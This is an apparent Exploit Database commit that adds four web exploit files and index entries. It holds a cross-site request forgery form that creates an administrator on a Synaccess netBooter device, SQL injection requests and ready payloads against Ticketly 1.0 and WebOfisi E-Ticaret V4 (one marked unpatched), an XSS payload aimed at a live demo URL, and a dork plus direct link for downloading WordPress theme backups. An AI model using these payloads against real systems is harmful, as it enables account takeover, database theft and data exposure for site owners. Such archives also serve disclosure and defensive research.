DB: 2018-11-22
4 changes to exploits/shellcodes macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin) Ticketly 1.0 - 'name' SQL Injection WordPress CherryFramework Themes 3.1.4 - Backup File Download WebOfisi E-Ticaret V4 - 'urun' SQL Injection
This commit is contained in:
parent
e3299ef341
commit
7967efda82
5 changed files with 171 additions and 1 deletions
28
exploits/hardware/webapps/45894.txt
Normal file
28
exploits/hardware/webapps/45894.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
# Title: Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
|
||||
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
|
||||
# Exploit Date: 2018-11-17
|
||||
# Vendor: Synaccess Networks Inc.
|
||||
# Product web page: https://www.synaccess-net.com
|
||||
# Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
|
||||
# Tested on: Synaccess server
|
||||
# CVE: N/A
|
||||
# Advisory ID: ZSL-2018-5501
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php
|
||||
|
||||
# Desc: The application interface allows users to perform certain
|
||||
# actions via HTTP requests without performing any validity checks
|
||||
# to verify the requests. This can be exploited to perform certai
|
||||
# actions with administrative privileges if a logged-in user visits
|
||||
# a malicious web site.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.0.19:8082/adm.htm" method="POST">
|
||||
<input type="hidden" name="add1" value="Nimda" />
|
||||
<input type="hidden" name="add2" value="123456" />
|
||||
<input type="hidden" name="add3" value="123456" />
|
||||
<input type="hidden" name="adm0" value="1" />
|
||||
<input type="submit" value="Gou" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
70
exploits/php/webapps/45895.txt
Normal file
70
exploits/php/webapps/45895.txt
Normal file
|
@ -0,0 +1,70 @@
|
|||
# Exploit Title: Ticketly 1.0 – 'name' SQL Injection
|
||||
# Exploit Author: Javier Olmedo
|
||||
# Website: https://hackpuntes.com
|
||||
# Date: 2018-11-19
|
||||
# Google Dork: N/A
|
||||
# Vendor: Abisoft (https://abisoftgt.net)
|
||||
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
|
||||
# Affected Version: 1.0
|
||||
# Patched Version: unpatched
|
||||
# Category: Web Application
|
||||
# Platform: Windows & Ubuntu
|
||||
# Tested on: Win10x64 & Kali Linux
|
||||
# 6. References:
|
||||
# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/
|
||||
# CVE: N/A
|
||||
|
||||
# 1. Technical Description:
|
||||
# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
|
||||
# resources through POST. This allows a attacker to read and modify
|
||||
# sensitive information from the database used by the application.
|
||||
|
||||
# 2. Proof Of Concept (PoC):
|
||||
# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
|
||||
---
|
||||
POST /ticketly/action/addproject.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: */*
|
||||
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/ticketly/projects.php
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 32
|
||||
Connection: close
|
||||
|
||||
name=Test%22&description=Test
|
||||
---
|
||||
|
||||
# 2.2 In another request, add two ' to receive a code 200 OK
|
||||
---
|
||||
POST /ticketly/action/addproject.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: */*
|
||||
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/ticketly/projects.php
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 32
|
||||
Connection: close
|
||||
|
||||
name=Test%22%22&description=Test
|
||||
---
|
||||
|
||||
# 3. Payloads
|
||||
# 3.1 Payload (boolean-based blind)
|
||||
name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
|
||||
|
||||
# 3.2 Payload (error-based)
|
||||
name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
|
||||
|
||||
#3.3 Payload (AND/OR time-based blind)
|
||||
name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
|
||||
|
||||
# 4. Vulnerables resources and parameters
|
||||
# /action/addproject.php (description, name, category_id and description)
|
||||
# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
|
||||
# /reports.php (kind_id y status_id)
|
24
exploits/php/webapps/45896.txt
Normal file
24
exploits/php/webapps/45896.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: Wordpress CherryFramework Themes 3.1.4 - Backup File Download
|
||||
# Google Dork: inurl:/wp-content/themes/CherryFramework
|
||||
# Date: 2018-11-17
|
||||
# Exploit Author: b1p0l4r
|
||||
# Vendor Homepage: http://www.cherryframework.com/
|
||||
# Software Link: http://www.cherryframework.com/
|
||||
# Version: 3.x.x > 3.1.4
|
||||
# Tested on: Ubuntu 18.0.4.1
|
||||
# CVE : N/A
|
||||
|
||||
# The CherryFramework Cherry theme 3.1.4 for WordPress allow
|
||||
# remote attackers to
|
||||
# obtain potentially sensitive information via
|
||||
# wp-content/themes/CherryFramework/admin/data_management/ download_backup.php
|
||||
# because it
|
||||
# offers the option of a ZIP archive containing the entire content of the wp-content/themes directory.
|
||||
|
||||
# [PoC]
|
||||
# just open that files/link and then showing the popup for saving a .ZIP file
|
||||
# EXAMPLE LINK =
|
||||
|
||||
https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php
|
||||
|
||||
# IndoXploit, ZeroByte.ID, Eldersc0de Family, Exploiter Xero Team
|
44
exploits/php/webapps/45897.txt
Normal file
44
exploits/php/webapps/45897.txt
Normal file
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: WebOfisi E-Ticaret V4 - 'urun' SQL Injection
|
||||
# Date: 2018-11-21
|
||||
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
||||
# Contact: https://pentest.com.tr
|
||||
# Vendor Homepage: https://www.web-ofisi.com
|
||||
# Software Demo: http://demobul.net/eticaretv4/
|
||||
# Software Link: https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing
|
||||
# Version: v4.0
|
||||
# Category: Webapps
|
||||
# Tested on: XAMPP for Linux
|
||||
# Description: E-Ticaret v4 is a professional online shopping script with many features.
|
||||
# Vulnerabilities have been discovered during penetration testing.
|
||||
|
||||
# PoC : SQLi :
|
||||
# Request : /eticaretv4/arama.html?kategori=20&urun=test
|
||||
|
||||
# Parameter : urun (GET)
|
||||
# Type : boolean-based blind
|
||||
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||
# Payload:
|
||||
|
||||
kategori=20&urun=test") RLIKE (SELECT (CASE WHEN (6525=6525)THEN 0x74656474 ELSE 0x28 END)) AND ("YWLa"="YWLa
|
||||
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload:
|
||||
|
||||
kategori=20&urun=test") OR (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT(ELT(6556=6556,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("ExaV"="ExaV
|
||||
|
||||
# Type: stacked queries
|
||||
# Title: MySQL < 5.0.12 stacked queries (heavy query)
|
||||
# Payload:
|
||||
|
||||
kategori=20&urun=test");SELECT BENCHMARK(5000000,MD5(0x44527964)) AND ("KGaO"="KGaO
|
||||
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 OR time-based blind
|
||||
# Payload:
|
||||
|
||||
kategori=20&urun=test") OR SLEEP(5) AND ("sDnb"="sDnb
|
||||
|
||||
# PoC : XSS :
|
||||
# Payload :
|
||||
http://demobul.net/eticaretv4/arama.html?kategori=20&urun=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
|
|
@ -6194,7 +6194,7 @@ id,file,description,date,author,type,platform,port
|
|||
45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
|
||||
45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
|
||||
45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
|
||||
45891,exploits/macos/dos/45891.c,"macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
|
||||
45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -40396,3 +40396,7 @@ id,file,description,date,author,type,platform,port
|
|||
45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80
|
||||
45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
|
||||
45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80
|
||||
45894,exploits/hardware/webapps/45894.txt,"Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)",2018-11-21,LiquidWorm,webapps,hardware,
|
||||
45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
|
||||
45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80
|
||||
45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue